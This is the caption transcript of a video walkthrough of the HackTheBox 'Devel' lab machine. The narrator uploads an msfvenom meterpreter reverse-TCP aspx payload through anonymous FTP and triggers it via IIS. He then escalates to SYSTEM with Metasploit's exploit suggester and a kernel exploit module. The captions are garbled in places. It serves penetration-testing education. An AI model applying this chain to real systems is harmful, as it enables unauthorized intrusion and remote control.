HackTheBox Devel CTF walkthrough - Privilege Escalation via Kernel Exploitation with Metasploit

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

privilege escalation by a kernel exploitation in like anyone can even know that hi friends so today's introduction is a little lengthier than usual so if you prefer to just jump straight into the lesson go to this time marker now please please I don't have any time for any gosip now yes so if you're still here welcome so today as part of our learning C2 with Med exploit series I'll kick off a whole series of videos on privilege escalation specifically in this video and the next one we'll be covering privilege escalation via kernel exploitation privilege escalation via kernel exploitation privilege escalation byel explation so the reason I'm dedicating two videos to this topic is that I would like for us to achieve the same outcome by following two different paths that being with Metasploit and without Metasploit now many people advise beginners to steer clear of Metasploit when you start learning raid teaming and this is not because metas sploit is too advanced for beginners but rather because metas sploit simplifies so many aspects of rate teing that it can actually impede your Learning Journey in effect metlo blackboxes and takes care of so many elements you'd usually need to do manually and so if you solely rely on met exploit you can develop major blind spots now I agree with this sentiment but with a caveat because in my opinion I think there is a third path that's even better and that is when we perform the same action with metas sploit and without metas sploit and we critically compare the two different approaches what I really like about this approach is that it shows us at the same time what is both unique and not unique to each different path when we start to understand the commonalities across all the different techniques it really helps us to better internalize what it is we are actually doing and additionally for beginners it really helps us to remove our blinders because sometimes we get stuck on this idea that every single machine only has a single solution so by solving the same machine in different ways it really helps free us from this limiting mindset free your mind so far in this series we've only been attacking virtual machines that we've set up ourselves now this is my preferred way to learn as it really promotes systems level thinking but at the same time it has a major limitation the limitation of course is that it would be nearly impossible to create a virtual machine that covers every single possible vulnerability and so because of this from now on we will supplement our approach of attacking our own virtual machine by also introducing specific machines from the hack the Box platform so in today's lesson we'll be gaining system level privileges via kernel exploitation by using Metasploit the specific hack the Box machine will be attacking is called devil sometimes I think you don't have any respect for me and you can find the link right at the top of the description so I do plan on making a very extensive theoretical exploration of all of privilege escalation in the future but for now if you would like to know a little bit more about what kernel exploitation is and what it entails I.E the theory underpinning it I've posted a link to an excellent lecture on this topic by Zack EOB right at the top of the description but in any case me thinks that's enough with all this flipp and Deli ding for now so let's get to it all right friends and so you can see I'm here in my terminal on Cali and I've already connected to the machine so all that's done on the backside again this isn't going to be a CTF walkthrough so I'm not going to go through every single step of how you would solve a typical CTF at norum rather let's just kind of quickly get our foothold so we can get to the real focus of today which is of course privilege escalation using kernel exploitation all right so the first thing we'll do is our good old friend nmap and I'll enumerate for standard versions and run standard script scrips and devel is 10 10 105 a few moments later all right friends and here you can see our results so we can immediately see two ports are open 21 FTP as well as 80 HTTP so let's just look at it a little closer uh the first thing that obviously stands out for us looking at the FTP uh is that Anonymous login is allowed uh not only is anonymous login allowed it's showing us a directory overview of the files on the FTP drive and if we look at these files something imately stands out to me now for those of you that didn't know there are three major web servers that are the three most popular servers that people typically run uh the first two are Linux and they're called apachean engine X and the third one is the sole Microsoft web server in this top three and it's called IIs and so we can immediately notice that they're running Microsoft I on the web server on Port 80 but if we look at these files you can even see their IIs start. HTM so immedi mediately this looks to me as if these are the files that are the default files if you've just freshly installed IIs so let's quickly go have a look at the website and we see the website and we see that the website itself on Port 80 right is still the default install and and I don't know if you remember we just saw welcome. PNG uh and if we looked if we inspected this uh there we can see indeed this is welcome. PNG uh so perhaps you've now already like put two and two together uh but if not no worries let's quickly head back to the terminal and so what it basically is guys is that the files here that are on the FTP server are basically the files that are being hosted and displayed by the HTTP server and so we can immediately think that if we're able to perhaps upload something on the FTP server we will be able to access that file that we uploaded via the HTTP server and what's something that we love to be able to upload and execute of course any script or payload that can do a reverse TCP connection back to a listener on our end and so immediately even before logging on I'm just going to use MSA Venom and create a payload but right before we do that we can run IPA to just quickly check our IP address and now here's another thing guys if you're not used to hack the Box you know you typically look at your IP there and then you think well that's my IP this is obviously the interface of my private landan so that's my private IP address but right now we're tunneled you see tun into another Network where I am now on the hack the Box Network the hack the Box network has no idea that on my local land this is my IP instead when we connect it with the VPN to the hack the Box Network it assigned an IP to us and this is our IP so I'm just going to copy my IP next thing we'll run MSA Venom so I'll just type Tye MSA Venom P for payload and then our shell because we're going to be using metas spits is a meterpreter shell right and then finally we'll choose a reverse TCP connection so we just saw the lhost just going to paste that and then L Port can obviously be anything I'll just choose 1 2 3 4 uh and then the next one is the file type now this is pretty important because we want to make sure that the server is capable of actually executing the file and so for example I've sure you've seen before if you en counter a web server that's using PHP you typically craft a script in PHP to ensure that that system is able to execute it so format we can choose that's a very safe bit on a i server would be aspx and without going into it too deeply that's just simply because the aspx files are part of the asp.net framework which is the serers side web application framework used by IIs and so finally we can just choose a name and I'll just call it kernel. aspx so we can see we have successfully generated our payload so the next step now is to get this payload onto the victim system so we saw during the nmap scan that we do have Anonymous access to the FTP drive so then hopefully we'll have the ability to upload this payload to the FTP server whereafter we can touch it with the HTTP server so with FTP it's very simple you just write FTP and the IP it's asking us for a name and so we'll write Anonymous and for password again we will write Anonymous and we can see we're logged in let's just run dur and we can see that the three files that we saw during the nmap scan are indeed the three files here on the FTP server so next thing we'll just upload our payload with the command put kernel thatx and we can see that we've successfully uploaded it and so we can just get out of the the FTP server going to clear and now we should theoretically be able to use our web browser to execute the payload but obviously that's one half of the puzzle we also now need our Handler or listener and so in this case I'll open msf console uh so that we can create a meterpreter Handler great so the first thing is I'll write use multi Handler now the next thing is we need to choose our specific type of payload and as I've shared before there should be an exact reflection of the payload that we created earlier so we'll write set payload and we did Windows interpreter reverse TCP and we have the three typical options so first let's set lhost and it's 10 1044 we set L port and we chose 1 2 3 4 and finally I'll set exit on session to false then I'll run with J to put it in the background and we can see our Handler right there so we have this Handler and it's stationed at Port 1 2 3 4 now it's just waiting for the incoming call right and we have our payload on the FTP server and if we trigger that payload it's going to call back and give us our connection so now really the only thing to do is to trigger our payload so let's go back to our web browser and here on our web browser we're simply going to write for Slash kernel. aspx and let's go check back with msf console and we can see right there meterpreter Session One opened can confirm there we can see it and so the next thing obviously let's just use our interpreter shell with i for interact and one great and we have our meterpreter shell now since as I said in the beginning we'll be doing everything with metasport in this specific video today we'll be using an automatic enumerating module from met exploit called suggester now I do want to mention that we have a shell on the victim system and then often I've seen when people get a interpreter shell the first thing they do is just write shells straight away and because it takes them to command prompt which is something they're used to and I've actually noticed that some people just basically think meterpreter is kind of like a stepping stone to just get to a command promp shell and but meterpreter offers us a whole lot of bolt-in tools that we can't get with our regular command prompt shell and so this is such a case and so we use the command post for post exploitation multi because sounds cool Recon that's what we're doing and then really the gist of it is the name of the model which is local exploit suggestor so let's run that a few moments later and here you can see the results friends you can see there are a whole lot of exploits that metas thinks the system is potentially vulnerable too so today of course since the focus is Kernel exploits we'll be focusing on krod now if you weren't focusing on anything specific you were just trying to pull this box like a Le haacker well then you could literally go through these one by one you could spend some more time researching each of these seeing what the typical success rate is or you can simply use the things that you're familiar with and have worked well for you in the past but in this case we'll specifically use kit rod and I'm actually just going to right click and copy that because this is now the name of the module we're going to use and so here we're actually going to background our meterpreter shell which of course means it's still running but we get to interact with the msf console again and also take note what your session number is in our case the session is one and so next I'm just going to write use and I'm going to paste the name that we just copied of the specific exploit kit repart going to hit enter write show options now the first thing we see here right up top is session and as I just said uh my session is one and yours might be different uh the next thing is the lhost which is our lhost which is of course 10 1044 and now the next one is Port I'm going to leave it 444 it can be anything except for the port that's already occupied by our session one because essentially we're going to use this exploit to create a brand new session in which we should be system and so really that's it and we should just be able to run it and get our new shell as system and we can see we have a new metri shell so let's drop into our Command prom shell then let's write who am I and we can see that we're system and so basically we've elevated our privileges from the regular user to system the highest Authority and how do we do that well we did that simply by using a built-in Metasploit module which allowed us to take advantage of a kernel exploit which was in turn identified by local exploit suggestor another metas sploit module so we used a metas modu to enumerate then we used another metas sploit module to then capitalize on this exploit okay friends well I hope you enjoyed that lesson I'll be back with another video shortly where we'll essentially be doing the same thing but without Metasploit be sure to keep a lookout because it will obviously be awesome but until then peace [Music] out [Music] [Applause] [Music] [Applause]

Info

Channel: faan ross

Views: 553

Rating: undefined out of 5

Keywords:

Id: BRurEae5vHo

Channel Id: undefined

Length: 14min 37sec (877 seconds)

Published: Thu Dec 14 2023